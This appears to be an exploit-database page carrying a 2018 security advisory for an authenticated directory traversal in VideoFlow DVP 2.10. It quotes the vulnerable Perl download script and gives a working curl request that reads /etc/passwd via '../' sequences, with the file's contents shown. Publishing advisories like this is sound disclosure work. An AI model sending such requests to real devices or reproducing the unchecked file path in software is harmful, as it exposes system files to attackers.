b6b60b70e9
11 changes to exploits/shellcodes WebLog Expert Enterprise 9.4 - Privilege Escalation Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC) Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC) Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery WampServer 3.1.2 - Cross-Site Request Forgery VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials DLink DIR-601 - Admin Password Disclosure OpenCMS 10.5.3 - Cross-Site Request Forgery OpenCMS 10.5.3 - Cross-Site Scripting Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change
108 lines
No EOL
4.1 KiB
Text
108 lines
No EOL
4.1 KiB
Text
VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal
|
|
|
|
Vendor: VideoFlow Ltd.
|
|
Product web page: http://www.video-flow.com
|
|
Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
|
|
|
|
System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
|
|
Version = The Operating System SW version number
|
|
Image version = Production Image version
|
|
|
|
System: DVP Protector
|
|
Version: 1.40.0.15(R) May 5 2015 05:27:05
|
|
Image version: 3.07i
|
|
|
|
System: DVP Protector
|
|
Version: 1.40.0.15(R) May 5 2015 05:27:05
|
|
Image version: 2.08
|
|
|
|
System: DVP Fortress
|
|
Version: 2.10.0.5(R) Jan 7 2018 03:26:35
|
|
Image version: 3.07
|
|
|
|
|
|
Summary: VideoFlow's Digital Video Protection (DVP) product is used by
|
|
leading companies worldwide to boost the reliability of IP networks, including
|
|
the public Internet, for professional live broadcast. DVP enables broadcast
|
|
companies to confidently contribute and distribute live video over IP with
|
|
unprecedented levels of service continuity, at a fraction of the cost of
|
|
leased lines or satellite links. It accelerates ROI by reducing operational
|
|
costs and enabling new revenue streams across a wide variety of markets.
|
|
|
|
Desc: The application suffers from an authenticated arbitrary file disclosure
|
|
vulnerability including no session expiration. Input passed via the 'ID' parameter
|
|
in several Perl scripts is not properly verified before being used to download
|
|
system files. This can be exploited to disclose the contents of arbitrary
|
|
files via directory traversal attacks.
|
|
|
|
Scripts affected:
|
|
|
|
$ grep -rnH "Content-Disposition" .
|
|
./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n";
|
|
./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n";
|
|
./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
|
|
./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n";
|
|
./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
|
|
|
|
----------------------------------------------------------------------------
|
|
/dvp100/confd/docroot/cgi-bin/downloadsys.pl:
|
|
---------------------------------------------
|
|
|
|
1 #!/usr/bin/perl -wT
|
|
2 # http://www.sitepoint.com/file-download-script-perl/
|
|
3
|
|
4 use strict;
|
|
5 use CGI;
|
|
6 use CGI::Carp qw ( fatalsToBrowser );
|
|
7 my $files_location;
|
|
8 my $query = CGI->new;
|
|
9 my $ID = $query->param('ID');
|
|
10 my @fileholder;
|
|
11
|
|
12 $files_location = "/dvp100/confd/docroot/cgi-bin/";
|
|
13 #$ID = "syslog.tar.gz"; #param('ID');
|
|
14
|
|
15 if ($ID eq '') {
|
|
16
|
|
17 } else {
|
|
18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file');
|
|
19 @fileholder = <DLFILE>;
|
|
20 close (DLFILE) || Error ('close', 'file');
|
|
21 print "Content-Type:application/x-download\n";
|
|
22 print "Content-Disposition:attachment;filename=$ID\n\n";
|
|
23 print @fileholder;
|
|
24 }
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
|
|
CentOS release 5.10 (Final) (2.6.18-371.el5)
|
|
ConfD
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2018-5454
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php
|
|
|
|
01.02.2018
|
|
|
|
---
|
|
|
|
|
|
curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218
|
|
root:x:0:0:root:/root:/bin/bash
|
|
bin:x:1:1:bin:/bin:/sbin/nologin
|
|
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
|
adm:x:3:4:adm:/var/adm:/sbin/nologin
|
|
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
|
|
sync:x:5:0:sync:/sbin:/bin/sync
|
|
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
|
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
|
|
news:x:9:13:news:/etc/news:
|
|
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
|
|
...
|
|
... |